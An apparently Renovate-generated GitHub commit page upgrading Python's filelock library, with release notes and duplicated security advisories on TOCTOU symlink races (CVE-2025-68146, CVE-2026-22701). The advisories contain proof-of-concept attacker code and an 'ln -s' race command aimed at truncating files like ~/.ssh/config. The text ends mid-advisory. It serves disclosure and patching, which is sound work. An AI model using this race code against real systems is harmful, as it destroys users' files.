🐛 fix(api): canonicalize singleton keys without following a final symlink by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#621](https://redirect.github.com/tox-dev/filelock/pull/621) - ✨ feat(unix): add fallback\_to\_soft opt-out for native locks by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#622](https://redirect.github.com/tox-dev/filelock/pull/622) - ✨ feat: add lock\_descriptor for a caller-owned descriptor by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#620](https://redirect.github.com/tox-dev/filelock/pull/620) - ✨ feat(api): add preserve\_lock\_file to keep the lock pathname by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#624](https://redirect.github.com/tox-dev/filelock/pull/624) - ✨ feat(api): add on\_acquired post-acquisition hook by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#625](https://redirect.github.com/tox-dev/filelock/pull/625) - 🔧 build(release): towncrier changelog pipeline, backfill, and docs by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#626](https://redirect.github.com/tox-dev/filelock/pull/626) - 📝 docs: drop bot entries and link code refs in the changelog by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#638](https://redirect.github.com/tox-dev/filelock/pull/638) - 🐛 fix(api): validate lifetime values by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#644](https://redirect.github.com/tox-dev/filelock/pull/644) - 🐛 fix(win32): capture process probe errors by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#645](https://redirect.github.com/tox-dev/filelock/pull/645) - 🐛 fix(api): reject dropped lock options by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#646](https://redirect.github.com/tox-dev/filelock/pull/646) - 🐛 fix(api): retain acquisition path identity by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#647](https://redirect.github.com/tox-dev/filelock/pull/647) - 🐛 fix(api): detach grouped release errors by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#648](https://redirect.github.com/tox-dev/filelock/pull/648) - 🐛 fix(descriptor): define unavailable behavior by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#650](https://redirect.github.com/tox-dev/filelock/pull/650) - 🐛 fix(ci): map absolute coverage paths by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#651](https://redirect.github.com/tox-dev/filelock/pull/651) - 🐛 fix(soft): relinquish fd before close by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#649](https://redirect.github.com/tox-dev/filelock/pull/649) - 🐛 fix(async): make cancellation atomic by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#652](https://redirect.github.com/tox-dev/filelock/pull/652) - 🐛 fix(sqlite): isolate forked connections by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#657](https://redirect.github.com/tox-dev/filelock/pull/657) - 🧪 test(conftest): scope the close mock to one descriptor by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#656](https://redirect.github.com/tox-dev/filelock/pull/656) - ✨ feat(soft): add strict soft locks and leases by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#658](https://redirect.github.com/tox-dev/filelock/pull/658) - ✨ feat(strict): replace shared markers with owner claims by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#659](https://redirect.github.com/tox-dev/filelock/pull/659) - 🐛 fix(soft): detect a reused PID via process start time by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#660](https://redirect.github.com/tox-dev/filelock/pull/660) - 🔒 fix(soft): fail safe on transient heartbeat errors by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#661](https://redirect.github.com/tox-dev/filelock/pull/661) - 📝 docs: state the lock trust boundaries once by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#663](https://redirect.github.com/tox-dev/filelock/pull/663) - 👷 ci(perf): add the performance and NFS matrix by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#664](https://redirect.github.com/tox-dev/filelock/pull/664) - Replace prettier with mdformat and yamlfmt by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#667](https://redirect.github.com/tox-dev/filelock/pull/667) - 👷 ci(matrix): add SMB, capability, and matrix docs by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#665](https://redirect.github.com/tox-dev/filelock/pull/665) **Full Changelog**: <tox-dev/filelock@3.29.7...3.30.0> </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Enabled. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://redirect.github.com/renovatebot/renovate). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMjQuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIyNC4xIiwidGFyZ2V0QnJhbmNoIjoibWFpbiIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiLCJmaWxlbG9jayIsInJlbm92YXRlIl19--> Co-authored-by: renovate-coop-norge[bot] <151545514+renovate-coop-norge[bot]@users.noreply.github.com>
renovate-coop-norge Bot
added a commit
to coopnorge/engineering-docker-images
that referenced
this pull request
Jul 16, 2026
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [filelock](https://redirect.github.com/tox-dev/py-filelock) | `3.29.7` → `3.30.0` |  |  | --- ### filelock has a TOCTOU race condition which allows symlink attacks during lock file creation [CVE-2025-68146](https://nvd.nist.gov/vuln/detail/CVE-2025-68146) / [GHSA-w853-jp5j-5j7f](https://redirect.github.com/advisories/GHSA-w853-jp5j-5j7f) / PYSEC-2026-1375 <details> <summary>More information</summary> #### Details ##### Impact A Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file. **Who is impacted:** All users of filelock on Unix, Linux, macOS, and Windows systems. The vulnerability cascades to dependent libraries: - **virtualenv users**: Configuration files can be overwritten with virtualenv metadata, leaking sensitive paths - **PyTorch users**: CPU ISA cache or model checkpoints can be corrupted, causing crashes or ML pipeline failures - **poetry/tox users**: through using virtualenv or filelock on their own. Attack requires local filesystem access and ability to create symlinks (standard user permissions on Unix; Developer Mode on Windows 10+). Exploitation succeeds within 1-3 attempts when lock file paths are predictable. ##### Patches Fixed in version **3.20.1**. **Unix/Linux/macOS fix:** Added O_NOFOLLOW flag to os.open() in UnixFileLock.\_acquire() to prevent symlink following. **Windows fix:** Added GetFileAttributesW API check to detect reparse points (symlinks/junctions) before opening files in WindowsFileLock.\_acquire(). **Users should upgrade to filelock 3.20.1 or later immediately.** ##### Workarounds If immediate upgrade is not possible: 1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note: different locking semantics, may not be suitable for all use cases) 2. Ensure lock file directories have restrictive permissions (chmod 0700) to prevent untrusted users from creating symlinks 3. Monitor lock file directories for suspicious symlinks before running trusted applications **Warning:** These workarounds provide only partial mitigation. The race condition remains exploitable. Upgrading to version 3.20.1 is strongly recommended. ______________________________________________________________________ ##### Technical Details: How the Exploit Works ##### The Vulnerable Code Pattern **Unix/Linux/macOS** (`src/filelock/_unix.py:39-44`): ```python def _acquire(self) -> None: ensure_directory_exists(self.lock_file) open_flags = os.O_RDWR | os.O_TRUNC # (1) Prepare to truncate if not Path(self.lock_file).exists(): # (2) CHECK: Does file exist? open_flags |= os.O_CREAT fd = os.open(self.lock_file, open_flags, ...) # (3) USE: Open and truncate ``` **Windows** (`src/filelock/_windows.py:19-28`): ```python def _acquire(self) -> None: raise_on_not_writable_file(self.lock_file) # (1) Check writability ensure_directory_exists(self.lock_file) flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC # (2) Prepare to truncate fd = os.open(self.lock_file, flags, ...) # (3) Open and truncate ``` ##### The Race Window The vulnerability exists in the gap between operations: **Unix variant:** ``` Time Victim Thread Attacker Thread ---- ------------- --------------- T0 Check: lock_file exists? → False T1 ↓ RACE WINDOW T2 Create symlink: lock → victim_file T3 Open lock_file with O_TRUNC → Follows symlink → Opens victim_file → Truncates victim_file to 0 bytes! ☠️ ``` **Windows variant:** ``` Time Victim Thread Attacker Thread ---- ------------- --------------- T0 Check: lock_file writable? T1 ↓ RACE WINDOW T2 Create symlink: lock → victim_file T3 Open lock_file with O_TRUNC → Follows symlink/junction → Opens victim_file → Truncates victim_file to 0 bytes! ☠️ ``` ##### Step-by-Step Attack Flow **1. Attacker Setup:** ```python ##### Attacker identifies target application using filelock lock_path = "/tmp/myapp.lock" # Predictable lock path victim_file = "/home/victim/.ssh/config" # High-value target ``` **2. Attacker Creates Race Condition:** ```python import os import threading def attacker_thread(): # Remove any existing lock file try: os.unlink(lock_path) except FileNotFoundError: pass # Create symlink pointing to victim file os.symlink(victim_file, lock_path) print(f"[Attacker] Created: {lock_path} → {victim_file}") ##### Launch attack threading.Thread(target=attacker_thread).start() ``` **3. Victim Application Runs:** ```python from filelock import UnixFileLock ##### Normal application code lock = UnixFileLock("/tmp/myapp.lock") lock.acquire() # ← VULNERABILITY TRIGGERED HERE ##### At this point, /home/victim/.ssh/config is now 0 bytes! ``` **4. What Happens Inside os.open():** On Unix systems, when `os.open()` is called: ```c // Linux kernel behavior (simplified) int open(const char *pathname, int flags) { struct file *f = path_lookup(pathname); // Resolves symlinks by default! if (flags & O_TRUNC) { truncate_file(f); // ← Truncates the TARGET of the symlink } return file_descriptor; } ``` Without `O_NOFOLLOW` flag, the kernel follows the symlink and truncates the target file. ##### Why the Attack Succeeds Reliably **Timing Characteristics:** - **Check operation** (Path.exists()): ~100-500 nanoseconds - **Symlink creation** (os.symlink()): ~1-10 microseconds - **Race window**: ~1-5 microseconds (very small but exploitable) - **Thread scheduling quantum**: ~1-10 milliseconds **Success factors:** 1. **Tight loop**: Running attack in a loop hits the race window within 1-3 attempts 2. **CPU scheduling**: Modern OS thread schedulers frequently context-switch during I/O operations 3. **No synchronization**: No atomic file creation prevents the race 4. **Symlink speed**: Creating symlinks is extremely fast (metadata-only operation) ##### Real-World Attack Scenarios **Scenario 1: virtualenv Exploitation** ```python ##### Victim runs: python -m venv /tmp/myenv ##### Attacker racing to create: os.symlink("/home/victim/.bashrc", "/tmp/myenv/pyvenv.cfg") ##### Result: /home/victim/.bashrc overwritten with: ##### home = /usr/bin/python3 ##### include-system-site-packages = false ##### version = 3.11.2 ##### ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker ``` **Scenario 2: PyTorch Cache Poisoning** ```python ##### Victim runs: import torch ##### PyTorch checks CPU capabilities, uses filelock on cache ##### Attacker racing to create: os.symlink("/home/victim/.torch/compiled_model.pt", "/home/victim/.cache/torch/cpu_isa_check.lock") ##### Result: Trained ML model checkpoint truncated to 0 bytes ##### Impact: Weeks of training lost, ML pipeline DoS ``` ##### Why Standard Defenses Don't Help **File permissions don't prevent this:** - Attacker doesn't need write access to victim_file - os.open() with O_TRUNC follows symlinks using the *victim's* permissions - The victim process truncates its own file **Directory permissions help but aren't always feasible:** - Lock files often created in shared /tmp directory (mode 1777) - Applications may not control lock file location - Many apps use predictable paths in user-writable directories **File locking doesn't prevent this:** - The truncation happens *during* the open() call, before any lock is acquired - fcntl.flock() only prevents concurrent lock acquisition, not symlink attacks ##### Exploitation Proof-of-Concept Results From empirical testing with the provided PoCs: **Simple Direct Attack** (`filelock_simple_poc.py`): - Success rate: 33% per attempt (1 in 3 tries) - Average attempts to success: 2.1 - Target file reduced to 0 bytes in \<100ms **virtualenv Attack** (`weaponized_virtualenv.py`): - Success rate: ~90% on first attempt (deterministic timing) - Information leaked: File paths, Python version, system configuration - Data corruption: Complete loss of original file contents **PyTorch Attack** (`weaponized_pytorch.py`): - Success rate: 25-40% per attempt - Impact: Application crashes, model loading failures - Recovery: Requires cache rebuild or model retraining **Discovered and reported by:** George Tsigourakos (@​tsigouris007) #### Severity - CVSS Score: 6.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H` #### References - [https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f) - [https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e](https://redirect.github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e) - [https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock) - [https://github.com/tox-dev/filelock/releases/tag/3.20.1](https://redirect.github.com/tox-dev/filelock/releases/tag/3.20.1) - [https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants](https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants) - [https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html](https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-w853-jp5j-5j7f) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### filelock has a TOCTOU race condition which allows symlink attacks during lock file creation [CVE-2025-68146](https://nvd.nist.gov/vuln/detail/CVE-2025-68146) / [GHSA-w853-jp5j-5j7f](https://redirect.github.com/advisories/GHSA-w853-jp5j-5j7f) / PYSEC-2026-1375 <details> <summary>More information</summary> #### Details ##### Impact A Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file. **Who is impacted:** All users of filelock on Unix, Linux, macOS, and Windows systems. The vulnerability cascades to dependent libraries: - **virtualenv users**: Configuration files can be overwritten with virtualenv metadata, leaking sensitive paths - **PyTorch users**: CPU ISA cache or model checkpoints can be corrupted, causing crashes or ML pipeline failures - **poetry/tox users**: through using virtualenv or filelock on their own. Attack requires local filesystem access and ability to create symlinks (standard user permissions on Unix; Developer Mode on Windows 10+). Exploitation succeeds within 1-3 attempts when lock file paths are predictable. ##### Patches Fixed in version **3.20.1**. **Unix/Linux/macOS fix:** Added O_NOFOLLOW flag to os.open() in UnixFileLock.\_acquire() to prevent symlink following. **Windows fix:** Added GetFileAttributesW API check to detect reparse points (symlinks/junctions) before opening files in WindowsFileLock.\_acquire(). **Users should upgrade to filelock 3.20.1 or later immediately.** ##### Workarounds If immediate upgrade is not possible: 1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note: different locking semantics, may not be suitable for all use cases) 2. Ensure lock file directories have restrictive permissions (chmod 0700) to prevent untrusted users from creating symlinks 3. Monitor lock file directories for suspicious symlinks before running trusted applications **Warning:** These workarounds provide only partial mitigation. The race condition remains exploitable. Upgrading to version 3.20.1 is strongly recommended. ______________________________________________________________________ ##### Technical Details: How the Exploit Works ##### The Vulnerable Code Pattern **Unix/Linux/macOS** (`src/filelock/_unix.py:39-44`): ```python def _acquire(self) -> None: ensure_directory_exists(self.lock_file) open_flags = os.O_RDWR | os.O_TRUNC # (1) Prepare to truncate if not Path(self.lock_file).exists(): # (2) CHECK: Does file exist? open_flags |= os.O_CREAT fd = os.open(self.lock_file, open_flags, ...) # (3) USE: Open and truncate ``` **Windows** (`src/filelock/_windows.py:19-28`): ```python def _acquire(self) -> None: raise_on_not_writable_file(self.lock_file) # (1) Check writability ensure_directory_exists(self.lock_file) flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC # (2) Prepare to truncate fd = os.open(self.lock_file, flags, ...) # (3) Open and truncate ``` ##### The Race Window The vulnerability exists in the gap between operations: **Unix variant:** ``` Time Victim Thread Attacker Thread ---- ------------- --------------- T0 Check: lock_file exists? → False T1 ↓ RACE WINDOW T2 Create symlink: lock → victim_file T3 Open lock_file with O_TRUNC → Follows symlink → Opens victim_file → Truncates victim_file to 0 bytes! ☠️ ``` **Windows variant:** ``` Time Victim Thread Attacker Thread ---- ------------- --------------- T0 Check: lock_file writable? T1 ↓ RACE WINDOW T2 Create symlink: lock → victim_file T3 Open lock_file with O_TRUNC → Follows symlink/junction → Opens victim_file → Truncates victim_file to 0 bytes! ☠️ ``` ##### Step-by-Step Attack Flow **1. Attacker Setup:** ```python ##### Attacker identifies target application using filelock lock_path = "/tmp/myapp.lock" # Predictable lock path victim_file = "/home/victim/.ssh/config" # High-value target ``` **2. Attacker Creates Race Condition:** ```python import os import threading def attacker_thread(): # Remove any existing lock file try: os.unlink(lock_path) except FileNotFoundError: pass # Create symlink pointing to victim file os.symlink(victim_file, lock_path) print(f"[Attacker] Created: {lock_path} → {victim_file}") ##### Launch attack threading.Thread(target=attacker_thread).start() ``` **3. Victim Application Runs:** ```python from filelock import UnixFileLock ##### Normal application code lock = UnixFileLock("/tmp/myapp.lock") lock.acquire() # ← VULNERABILITY TRIGGERED HERE ##### At this point, /home/victim/.ssh/config is now 0 bytes! ``` **4. What Happens Inside os.open():** On Unix systems, when `os.open()` is called: ```c // Linux kernel behavior (simplified) int open(const char *pathname, int flags) { struct file *f = path_lookup(pathname); // Resolves symlinks by default! if (flags & O_TRUNC) { truncate_file(f); // ← Truncates the TARGET of the symlink } return file_descriptor; } ``` Without `O_NOFOLLOW` flag, the kernel follows the symlink and truncates the target file. ##### Why the Attack Succeeds Reliably **Timing Characteristics:** - **Check operation** (Path.exists()): ~100-500 nanoseconds - **Symlink creation** (os.symlink()): ~1-10 microseconds - **Race window**: ~1-5 microseconds (very small but exploitable) - **Thread scheduling quantum**: ~1-10 milliseconds **Success factors:** 1. **Tight loop**: Running attack in a loop hits the race window within 1-3 attempts 2. **CPU scheduling**: Modern OS thread schedulers frequently context-switch during I/O operations 3. **No synchronization**: No atomic file creation prevents the race 4. **Symlink speed**: Creating symlinks is extremely fast (metadata-only operation) ##### Real-World Attack Scenarios **Scenario 1: virtualenv Exploitation** ```python ##### Victim runs: python -m venv /tmp/myenv ##### Attacker racing to create: os.symlink("/home/victim/.bashrc", "/tmp/myenv/pyvenv.cfg") ##### Result: /home/victim/.bashrc overwritten with: ##### home = /usr/bin/python3 ##### include-system-site-packages = false ##### version = 3.11.2 ##### ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker ``` **Scenario 2: PyTorch Cache Poisoning** ```python ##### Victim runs: import torch ##### PyTorch checks CPU capabilities, uses filelock on cache ##### Attacker racing to create: os.symlink("/home/victim/.torch/compiled_model.pt", "/home/victim/.cache/torch/cpu_isa_check.lock") ##### Result: Trained ML model checkpoint truncated to 0 bytes ##### Impact: Weeks of training lost, ML pipeline DoS ``` ##### Why Standard Defenses Don't Help **File permissions don't prevent this:** - Attacker doesn't need write access to victim_file - os.open() with O_TRUNC follows symlinks using the *victim's* permissions - The victim process truncates its own file **Directory permissions help but aren't always feasible:** - Lock files often created in shared /tmp directory (mode 1777) - Applications may not control lock file location - Many apps use predictable paths in user-writable directories **File locking doesn't prevent this:** - The truncation happens *during* the open() call, before any lock is acquired - fcntl.flock() only prevents concurrent lock acquisition, not symlink attacks ##### Exploitation Proof-of-Concept Results From empirical testing with the provided PoCs: **Simple Direct Attack** (`filelock_simple_poc.py`): - Success rate: 33% per attempt (1 in 3 tries) - Average attempts to success: 2.1 - Target file reduced to 0 bytes in \<100ms **virtualenv Attack** (`weaponized_virtualenv.py`): - Success rate: ~90% on first attempt (deterministic timing) - Information leaked: File paths, Python version, system configuration - Data corruption: Complete loss of original file contents **PyTorch Attack** (`weaponized_pytorch.py`): - Success rate: 25-40% per attempt - Impact: Application crashes, model loading failures - Recovery: Requires cache rebuild or model retraining **Discovered and reported by:** George Tsigourakos (@​tsigouris007) #### Severity - CVSS Score: 6.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H` #### References - [https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f) - [https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e](https://redirect.github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e) - [https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock) - [https://github.com/tox-dev/filelock/releases/tag/3.20.1](https://redirect.github.com/tox-dev/filelock/releases/tag/3.20.1) - [https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants](https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants) - [https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html](https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html) - [https://pypi.org/project/filelock](https://pypi.org/project/filelock) - [https://github.com/advisories/GHSA-w853-jp5j-5j7f](https://redirect.github.com/advisories/GHSA-w853-jp5j-5j7f) - [https://nvd.nist.gov/vuln/detail/CVE-2025-68146](https://nvd.nist.gov/vuln/detail/CVE-2025-68146) This data is provided by [OSV](https://osv.dev/vulnerability/PYSEC-2026-1375) and the [PyPI Advisory Database](https://redirect.github.com/pypa/advisory-database) ([CC-BY 4.0](https://redirect.github.com/pypa/advisory-database/blob/main/LICENSE)). </details> --- ### filelock Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock [CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701) / [GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/advisories/GHSA-qmgc-5h2g-mvrw) / PYSEC-2026-1374 <details> <summary>More information</summary> #### Details ##### Vulnerability Summary **Title:** Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock **Affected Component:** `filelock` package - `SoftFileLock` class **File:** `src/filelock/_soft.py` lines 17-27 **CWE:** CWE-362, CWE-367, CWE-59 --- ##### Description A TOCTOU race condition vulnerability exists in the `SoftFileLock` implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly. The vulnerability occurs in the `_acquire()` method between `raise_on_not_writable_file()` (permission check) and `os.open()` (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service. ##### Attack Scenario ``` 1. Lock attempts to acquire on /tmp/app.lock 2. Permission validation passes 3. [RACE WINDOW] - Attacker creates: ln -s /tmp/important.txt /tmp/app.lock 4. os.open() tries to create lock file 5. Lock operates on attacker-controlled target file or fails ``` --- ##### Impact _What kind of vulnerability is it? Who is impacted?_ This is a **Time-of-Check-Time-of-Use (TOCTOU) race condition vulnerability** affecting any application using `SoftFileLock` for inter-process synchronization. **Affected Users:** - Applications using `filelock.SoftFileLock` directly - Applications using the fallback `FileLock` on systems without `fcntl` support (e.g., GraalPy) **Consequences:** - **Silent lock acquisition failure** - applications may not detect that exclusive resource access is not guaranteed - **Denial of Service** - attacker can prevent lock file creation by maintaining symlink - **Resource serialization failures** - multiple processes may acquire "locks" simultaneously - **Unintended file operations** - lock could operate on attacker-controlled files **CVSS v4.0 Score:** 5.6 (Medium) **Vector:** CVSS:4.0/AV:L/AT:L/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N **Attack Requirements:** - Local filesystem access to the directory containing lock files - Permission to create symlinks (standard for regular unprivileged users on Unix/Linux) - Ability to time the symlink creation during the narrow race window --- ##### Patches _Has the problem been patched? What versions should users upgrade to?_ Yes, the vulnerability has been patched by adding the `O_NOFOLLOW` flag to prevent symlink following during lock file creation. **Patched Version:** Next release (commit: 255ed068bc85d1ef406e50a135e1459170dd1bf0) **Mitigation Details:** - The `O_NOFOLLOW` flag is added conditionally and gracefully degrades on platforms without support - On platforms with `O_NOFOLLOW` support (most modern systems): symlink attacks are completely prevented - On platforms without `O_NOFOLLOW` (e.g., GraalPy): TOCTOU window remains but is documented **Users should:** - Upgrade to the patched version when available - For critical deployments, consider using `UnixFileLock` or `WindowsFileLock` instead of the fallback `SoftFileLock` --- ##### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ For users unable to update immediately: 1. **Avoid `SoftFileLock` in security-sensitive contexts** - use `UnixFileLock` or `WindowsFileLock` when available (these were already patched for CVE-2025-68146) 2. **Restrict filesystem permissions** - prevent untrusted users from creating symlinks in lock file directories: ```bash chmod 700 /path/to/lock/directory ``` 3. **Use process isolation** - isolate untrusted code from lock file paths to prevent symlink creation 4. **Monitor lock operations** - implement application-level checks to verify lock acquisitions are successful before proceeding with critical operations --- ##### References _Are there any links users can visit to find out more?_ - **Similar Vulnerability:** CVE-2025-68146 (TOCTOU vulnerability in UnixFileLock/WindowsFileLock) - **CWE-362 (Concurrent Execution using Shared Resource):** https://cwe.mitre.org/data/definitions/362.html - **CWE-367 (Time-of-check Time-of-use Race Condition):** https://cwe.mitre.org/data/definitions/367.html - **CWE-59 (Improper Link Resolution Before File Access):** https://cwe.mitre.org/data/definitions/59.html - **O_NOFOLLOW documentation:** https://man7.org/linux/man-pages/man2/open.2.html - **GitHub Repository:** https://github.com/tox-dev/filelock --- **Reported by:** George Tsigourakos (@​tsigouris007) #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H` #### References - [https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw) - [https://nvd.nist.gov/vuln/detail/CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701) - [https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0](https://redirect.github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0) - [https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5](https://redirect.github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5) - [https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-qmgc-5h2g-mvrw) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### filelock Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock [CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701) / [GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/advisories/GHSA-qmgc-5h2g-mvrw) / PYSEC-2026-1374 <details> <summary>More information</summary> #### Details ##### Vulnerability Summary **Title:** Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock **Affected Component:** `filelock` package - `SoftFileLock` class **File:** `src/filelock/_soft.py` lines 17-27 **CWE:** CWE-362, CWE-367, CWE-59 --- ##### Description A TOCTOU race condition vulnerability exists in the `SoftFileLock` implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly. The vulnerability occurs in the `_acquire()` method between `raise_on_not_writable_file()` (permission check) and `os.open()` (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service. ##### Attack Scenario ``` 1. Lock attempts to acquire on /tmp/app.lock 2. Permission validation passes 3. [RACE WINDOW] - Attacker creates: ln -s /tmp/important.txt /tmp/app.lock 4. os.open() tries to create lock file 5. Lock operates on attacker-controlled target file or fails ``` --- ##### Impact _What kind of vulnerability is it? Who is impacted?_ This is a **Time-of-Check-Time-of-Use (TOCTOU) race condition vulnerability** affecting any application using `SoftFileLock` for inter-process synchronization. **Affected Users:** - Applications using `filelock.SoftFileLock` directly - Applications using the fallback `FileLock` on systems without `fcntl` support (e.g., GraalPy) **Consequences:** - **Silent lock acquisition failure** - applications may not detect that exclusive resource access is not guaranteed - **Denial of Service** - attacker can prevent lock file creation by maintaining symlink - **Resource serialization failures** - multiple processes may acquire "locks" simultaneously - **Unintended file operations** - lock could operate on attacker-controlled files **CVSS v4.0 Score:** 5.6 (Medium) **Vector:** CVSS:4.0/AV:L/AT:L/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N **Attack Requirements:** - Local filesystem access to the directory containing lock files - Permission to create symlinks (standard for regular unprivileged users on Unix/Linux) - Ability to time the symlink creation during the narrow race window --- ##### Patches _Has the problem been patched? What versions should users upgrade to?_ Yes, the vulnerability has been patched by adding the `O_NOFOLLOW` flag to prevent symlink following during lock file creation. **Patched Version:** Next release (commit: 255ed068bc85d1ef406e50a135e1459170dd1bf0) **Mitigation Details:** - The `O_NOFOLLOW` flag is added conditionally and 